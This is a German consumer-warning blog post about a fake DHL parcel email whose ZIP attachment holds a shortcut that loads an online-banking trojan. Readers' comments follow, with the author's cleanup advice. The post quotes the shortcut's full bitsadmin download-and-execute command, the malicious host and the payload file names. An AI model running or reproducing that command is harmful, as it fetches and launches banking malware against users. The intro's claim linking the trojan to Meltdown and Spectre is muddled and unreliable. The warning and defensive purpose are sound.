Informationen zum Empfang eines Pakets von Agent: DHL ([email protected]) bringt einen Online-Banking-Trojaner!

Am Sonntag, den 04. März 2018 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in deutscher Sprache versendet. Klicken Sie nicht auf den Link und öffnen Sie nicht die ZIP-Datei! Eine Verknüpfung würde einen Online-Banking-Trojaner nachladen, der anschließend aufgrund von entstehenden Sicherheitslücken von Meltdown und Spectre in den Prozessoren Intel, AMD und ARM unter dem Vorwand eines neuen Verschlüsselungsalgorithmus Geld zu klauen!

Betreff: Informationen zum Empfang eines Pakets
Absender: Agent: DHL ([email protected])

Empfänger: Herr/Frau (Vorname Nachname)
DHL Express Tracking-Benachrichtigung: 4. März 2018
Benutzerdefinierte Referenz: DENL-020320186754
Tracking-Nummer: DHL-020320186754-DE
Abholdatum: 4.März 2018
Service: Luft
Stücke: 2

Verarbeitung abgeschlossen

Einzelheiten entnehmen Sie bitte dieser Datei.

Copyright © 2018 Agent: Grün, All rights reserved.
You are receiving this newsletter because you have been in contact with the founders or artists at Agent: Gruen. If you do not wish to receive news from us, please unsubscribe.

Our mailing address is:

Agent: Grün

Uracher Straße 31
Metzingen 72555
Germany

Add us to your address book

Want to change how you receive these emails?
You can update your preferences or unsubscribe from this list.

Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie deswegen nicht auf den Link und öffnen Sie nicht das ZIP-Archiv! Es handelt sich nicht um eine Tracking-Benachrichtigung! Der Name des Absenders wird missbräuchlich verwendet.

Der Link „dieser Datei“ bzw. das Icon verlinkt auf die Adresse auf fikhranhamshi.com/Neue_Paketbenachrichtigung.zip, von der ein ZIP-Archiv geladen würde.

Neue_Paketbenachrichtigung.zip

Das ZIP – Archiv enthält eine Verknüpfung. Klicken Sie nicht darauf, da sonst eine bösartige Software nachgeladen würde!

Diese Verknüpfung würde so aussehen:

%ComSpec% /c „bitsadmin /transfer hhmYERSEEEENTRY /priority foreground http://lan.grandguard.org/hmhGFRywlu.php %TEMP%\hmhGFRywlu.exe > NUL & start %TEMP%\hmhGFRywlu.exe“

Wie man hier sehen kann, soll eine Datei von lan.grandguard.org/hmhGFRywlu.php geladen und im Temp-Verzeichnis als „hmhGFRywlu.exe“ abgelegt und ausgeführt werden.

Würde man diese Adresse im Browser aufrufen, würde eine Datei geladen:

e606ca71708deeaf0b2e919dfdaf6ae8.exe

Laut Virustotal beträgt die Erkennungsrate 11/66!

 

Es handelt sich um die gleiche Betrugswelle, die bereits seit Ende der letzten Woche verbreitet wird. Wie das Trojanische Pferd im Online-Banking Geld klauen möchte, sehen Sie in den Warnungen

Kommentar(e)

35 Kommentare

  • Marlies Rohde

    Danke für diese Seite konnte mir sehr helfen bin zwei mal mit solchen Mail angeschrieben worden . super das es so was gibt . Mit freundlichen Gruss marlies Rohde

    • Das Handy kann die Datei sowieso nicht öffnen.. Viren pro Programm findet auch keine schadsoftware.. für die Handys harmlos oder ?

      • Sebastian Brück

        Ja, für Smartphones müsste es schon eine App (*.apk) sein.

        In letzter Zeit gab es aber auch viele Phishing-Mails (meistens im Namen von Banken, zuletzt aber auch mit Namen von PayPal), die direkt oder am Ende der Phishing-Seiten eine bösartige .apk-Datei verbreiten wollten. Bisher musste man dazu aber Installationen aus unbekannten Quellen zulassen. Bei iOS geht das meines Wissens eh‘ nicht und bei Android sollte man diese Einstellung deaktiviert lassen. Echte Apps der Unternehmen würden immer über die offiziellen Stores (iTunes, Google PlayStore) verteilt.

        • Das Handy hat bei der zip Datei gleich geschrieben,kann Datei nicht öffnen.. muss ich mir jetzt eh keine Sorgen machen und das Handy neu aufsetzen? Datei und Mail wurde schon gelöscht
          . Und Antivirus pro findet auch keine Dateien..

      • Ich Depp suche extra noch im Playstore nach einem Programm um dieses INK anzuzeigen.

  • Christopher Henkel

    Hallo, habe blauäugig versucht, die Datei vom Handy aus zu öffnen, jedoch keine App gefunden, die das geschafft hat (.ink)

    Ich hoffe, das hat keine Auswirkungen auf mein Online-Banking

    • Sebastian Brück

      Nein, die Datei wäre etwas für Windows-Geräte. Wenn Du ein iOS- oder Android-Gerät hast, dann würde die Verknüpfung nicht funktionieren und auch die .exe-Datei könnte nichts ausrichten.

  • Ich hab in dieser Woche 5!!! dieser Mails bekommen. Heute kam noch eine Zahlungsaufforderung von Gruen dazu…

    LG

  • Hallo, ich habe diese Emails auch erhalten und im Anschluß sogar eine „Rechnung“ ebenfalls mit einer zip-Datei. Habe versucht es zu entzippen und zu öffnen… scheiße scheiße scheiße.
    Was kann ich jetzt tun? Habe zu spät gecheckt, dass es wohl Spam ist..

    • Sebastian Brück

      Wenn Du es entpackt und die Verknüpfung darin geöffnet hast, dann könnte Dein Rechner verseucht sein. Der Name der bösartigen Datei ist in der Verknüpfung enthalten. In meinen Warnungen findest Du den Namen der Datei. Du könntest bei Dir im %Temp%-Verzeichnis schauen, ob dort eine solche ausführbare Datei enthalten ist (wenn Du durch Eingabe von %Temp% kein Verzeichnis findest, dann lasse Dir auch versteckte Verzeichnisse anzeigen und gehe über Benutzer > (Dein Benutzername) > AppData > Local > Temp.

      Sollte der Rechner infiziert sein, würde ich den Rechner aber formatieren oder jemanden zu Hilfe holen, der sich mit Trojanern auskennt und z. B. eine Boot-CD hat, um die Datei zu löschen. In der Registry könnte es vier Einträge geben (Shell), die auf ihn verweisen.

    • Sebastian Brück

      Außerdem solltest Du (falls Dein Rechner infiziert ist) nach der Säuberung alle Deine Passwörter ändern (angefangen vom E-Mail-Passwort, über Online-Banking, sonstige Zahlverfahren, Bestell-Accounts, alles, was Du an Passwörtern auf dem Rechner verwendet hast). Alternativ kannst Du die Passwörter auch schon über das Smartphone oder ein Tablet ändern (falls die Säuberung zu lange dauert).

      • Ich war gerade genau so dumm und habe die ZIP-Datei geladen. Nicht dezidiert entpackt aber geöffnet und die Verknüpfung angeklickt. Erst dann kam mir die Idee dass das gerade ein Virus/Trojaner sein könnte…

        –> es hat sich kein neues Fenster im Browser geöffnet
        –> im Downloadverlauf scheint außerder ZIP-Datei nichts zusätzliches geladen worden zu sein
        –> im Tempverzeichnis gibt es keine Exe-Datei

        Heißt das ich hatte Glück oder hat sich das Teil schon verselbständigt? Nützt mir ein Virenscan was oder komm ich ums neu Formatieren nicht drum rum? :/

        Danke für eure Hilfe.

        • Die ZIP-Datei war aber auch weg. Bin mir gerade nicht mehr sicher, ob ich sie selbst gelöscht hatte…oder war das vlt. Windows nach einem Neustart, den ich ausgeführt hatte?

        • Sebastian Brück

          Die Verknüpfung enthält ja die Anweisung, eine Datei zu laden und in das Temp-Verzeichnis unter einem bestimmten Namen zu speichern. Bei Tests war mein Rechner nicht immer erfolgreich. Manchmal habe ich auch nur eine MS DOS – Eingabeaufforderung gesehen und danach eine Fehlermeldung, weil die Verknüpfung die Datei nicht laden konnte.

          Lässt Du Dir versteckte Dateien anzeigen? Wenn im Temp-Verzeichnis (nicht das im Windows-Verzeichnis, sondern das bei den Benutzer > (Benutzername) > AppData > Local > Temp) keine .exe-Datei ist, solltest Du Glück gehabt haben.

          Ich habe noch nicht probiert, ob Virenscanner erfolgreich die Datei löschen könnten. Meistens ist es leider so, dass sich Trojaner so im System einnisten, dass der Virenscanner sie weder finden, noch beheben kann (sie sind ja im Speicher und würden sich in der Regel direkt nach dem Löschen neu abspeichern). Einen PC würde ich immer nur durch formatieren oder mit einer Boot CD mit Virenscanner säubern. Da die meisten Anwender keine solche Boot-CD haben, würde nur formatieren übrig bleiben. Aber vermutlich hattest Du Glück (wenn keine .exe-Datei da ist).

          Theoretisch könntest Du auch noch in der Registry schauen. Er hat sich hier eingetragen:

          Schlüsselname: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
          Name: C:\Users\(Benutzername)\AppData\Local\Temp\hmhGFRywlu.exe
          Daten: hmhGFRywlu

          Schlüsselname: HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
          Name: C:\Users\(Benutzername)\AppData\Local\Temp\hmhGFRywlu.exe
          Daten: hmhGFRywlu

          Schlüsselname: HKEY_USERS\S-1-5-21-3902788496-19138281-1987367691-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
          Name: C:\Users\(Benutzername)\AppData\Local\Temp\hmhGFRywlu.exe
          Daten: hmhGFRywlu

          Schlüsselname: HKEY_USERS\S-1-5-21-3902788496-19138281-1987367691-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
          Name: C:\Users\(Benutzername)\AppData\Local\Temp\hmhGFRywlu.exe
          Daten: hmhGFRywlu

          Außerdem hat er im Benutzer > (Benutzername) > AppData > Local noch ein etwas kryptisches Verzeichnis angelegt:

          • Danke Sebastian für deine mega schnelle und super ausführliche Antwort! Habe alles überprüft und keinerlei Anzeichen gefunden! Vermutlich Glück gehabt… 😉 Danke!

  • Woher nehmen die Absender dieser Tracking-Mails die Daten, also woher wissen die (Vor)Name und Anschrift? Würde mich mal interessieren.

  • Danke.
    Email kam mir komisch vor. Also erst mal zu
    Denic.de Domaene überprüft.
    Ist bei 1und1 angemeldet und eingerichtet.
    Firma bzw Inhaber wird auch Benannt.
    Dann auf Firmenwebseite gegangen.
    Mh alles unseriös.
    Anschließend zu Google und siehe da.
    Betrüger, also gelöscht.
    siehe da richtig. müll gelöscht

    • Ich wollte heute dort anrufen um die Leute aufzuklären dass die Email mißbraucht wird. Siehe da kein Anschluss unter dieser Nummer.

      • Sebastian Brück

        Es könnte auch ein alter Zugang zu einem Newslettersystem gewesen sein. Die genannte Internetdomain scheint nur bis vor ca. 2 Jahren mit einem Inhalt gefüllt gewesen zu sein (Fotograf). Danach gab es nur noch Fehlermeldungen und heute wird nur noch die Seite des Providers angezeigt.

  • Guten abend

    da ich es nicht wusste habe es trotzdem runter geladen und kamm mir kommisch vor habe dan Gegoogelt und kamm dan auf die seite hier und nach dem durch lesen habe ich es gleich ohne weiteres öffnen gelöscht

    LG R.

  • Hallo,
    Ich habe zu diesen E-Mails eine Frage.. mir würden heute 3 dieser E-Mails gesendet zwei von „DHL“ und eine mit zahlen Sie die „Rechnung“
    Als ich die DHL E-Mail bekam dachte ich sie wäre wirklich von DHL und klickte auf den Link dort öffnete sich eine ZIP Datei die ich aber nicht öffnen konnte lediglich in IOS bei Dateien speichern konnte.. Ich habe hier in den Kommentaren gelesen das der E-Mail Link nur für Microsoft gefährlich werden kann nicht wenn ich ihn über IOS geöffnet habe.. is das richtig? Und ist mein Handy/Banking app jetzt gefährdet?

    Danke schon im Voraus

    • Sebastian Brück

      Dein Apple-Gerät wüsste mit der Verknüpfung nichts anzufangen und eine .exe-Datei würde unter iOS auch nicht funktionieren.

  • Moin,

    habe auch zwei Mails bekommen. Seltsamerweise taucht in der DHL App im Sendungsverlauf eine Sendung zu mir auf wenn ich die in den Mails angegebene Trackingnr. dort eingebe. Bin deswegen fast drauf reingefallen weil ich wirklich auf eine Sendung warte aber zum Glück war meine Skepsis zu groß und ich habe die Nachrichten gelöscht. Puh…

    • Sebastian Brück

      Täter nutzen für bösartige E-Mails meistens Unternehmen, die man kennt und bei denen man vielleicht wirklich etwas bestellt hat oder wo man gerade ein Paket erwartet, etc.

      Solche E-Mails werden in großen Stückzahlen versendet und oftmals erreichen die Täter wirklich auch einige wenige Personen, die z. B. gerade auf eine Lieferung warten und deswegen klicken.

      Deswegen kann ich nur dazu raten, niemals einen Link in einer E-Mail anzuklicken. Wenn man eine Information überprüfen oder befolgen will, dann sollte man die Internetseite des Unternehmens über den Browser aufrufen und die Adresse von Hand eingeben (oder über Lesezeichen/Favoriten aufrufen), damit man immer auf der echten Seite landet. Wenn das Unternehmen wirklich etwas von mir will, dann würde es mir die Info auch dort anzeigen.

  • hab gestern auch 3 emails erhalten… und ich erwarte 2 Pakete deshalb dachte ich erst das die mails ok sind…. aber skeptisch war ich trotzdem zum Glück hat mein Iphone diese links nicht öffnen können, sonst wäre ich drauf rein gefallen….

  • Bei mir war es besonders blöd. Habe bei Ebay etwas aus Amerika bestellt, dass am Samstag per Flug nach Deutschland ging. Just am Sonntag bekam ich zwei Mails. Einmal diese DHL Mail und einmal eine Aufforderung eine Rechnung zu zahlen. Wusste echt nicht was zu tun ist wegen diesem dummen Zufall. Habe dann Ebay kontaktiert und die haben mir erst gesagt dass das ein Trojaner ist. Zum Glück nur mit meinem Android Handy geöffnet. Hab einen Viren-Scanner drüberlaufen lassen der nichts gefunden hat. Wäre/Bin echt drauf reingefallen.

  • Mich würde interessieren, wie der Zusammenhang zu meinem Arbeitgeber herausgefunden wurde. Ich habe an meine private E-Mail drei dieser E-Mails bekommen, die aber an meinen Arbeitgeber (namentlich) gerichtet wurden. Also an meine E-Mail, aber Empfänger der angeblichen Sendung mein Arbeitgeber. Sind gleich im Spam gelandet…trotzdem komisch

    • Sebastian Brück

      Hallo Gabi,

      wenn ich richtig gesehen habe, dürfte der Datensatz der Täter nur aus drei oder vier Datenfeldern bestehen: Anrede (Herr/Frau), Vor- und Nachname (als ein oder zwei Felder) und die E-Mail-Adresse. Das ist nicht viel. Durch Abgriffe von Datenbanken haben Täter oftmals mehr Informationen.

      Sofern die Daten öffentlich aufgetaucht sind, kannst Du z. B. bei Diensten wie have i been pwned abfragen, ob zu Deiner E-Mail-Adresse bereits bekannte Datensätze vorliegen.

      In diesem Fall müssen die Täter aber nicht mal in eine Datenbank eingebrochen sein. Solche Informationen findest Du auch in Adressbüchern, d. h. sie könnten auch durch Phishing eines E-Mail-Account, in deren Adressbuch Deine Adresse aufgelistet war oder durch Trojanische Pferde ergaunert worden sein.

      Hast Du irgendwann mal Deine private E-Mail-Adresse im Zusammenhang mit dem Namen Deines Arbeitgebers verwendet? Es reicht schon ein Kontaktformular, eine Newsletter, eine Bestellung, jemand hat Dir an diese Angaben eine E-Mail geschrieben, …

      Viele Grüße,

      Sebastian

      • Vielen Dank für die schnelle Antwort. Auf der angegebenen Seite „have i benn pwned“ ist die E-Mail-Adresse aufgetaucht. Ich habe auch in einer privaten Bestellung als Lieferanschrift meinen Arbeitgeber angegeben. Eins davon wird wohl der Grund sein. 🙁 Ich hoffe, dass es hilft das Passwort des E-Mail-Accounts zu ändern.

        VG Gabi

        • Sebastian Brück

          Du bekommst bei „have i been pwned“ ja meistens auch die Quelle angezeigt (also die Datenbank eines Unternehmens, in der die Adresse enthalten war). Falls Du dort einen Account hast, solltest Du deren Passwort ändern (denn das wurde ja vermutlich gestohlen). Aus Sicherheitsgründen zeigt „have i been pwned“ keine Passwörter an. Falls Du das Passwort auch bei anderen Accounts / Unternehmen verwendet hast, solltest Du es auch dort ändern.

          Vor weiteren betrügerischen E-Mails wird Dich das aber nicht schützen, denn die Täter haben Deine Daten und könnten Dir jederzeit wieder eine E-Mail schreiben.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.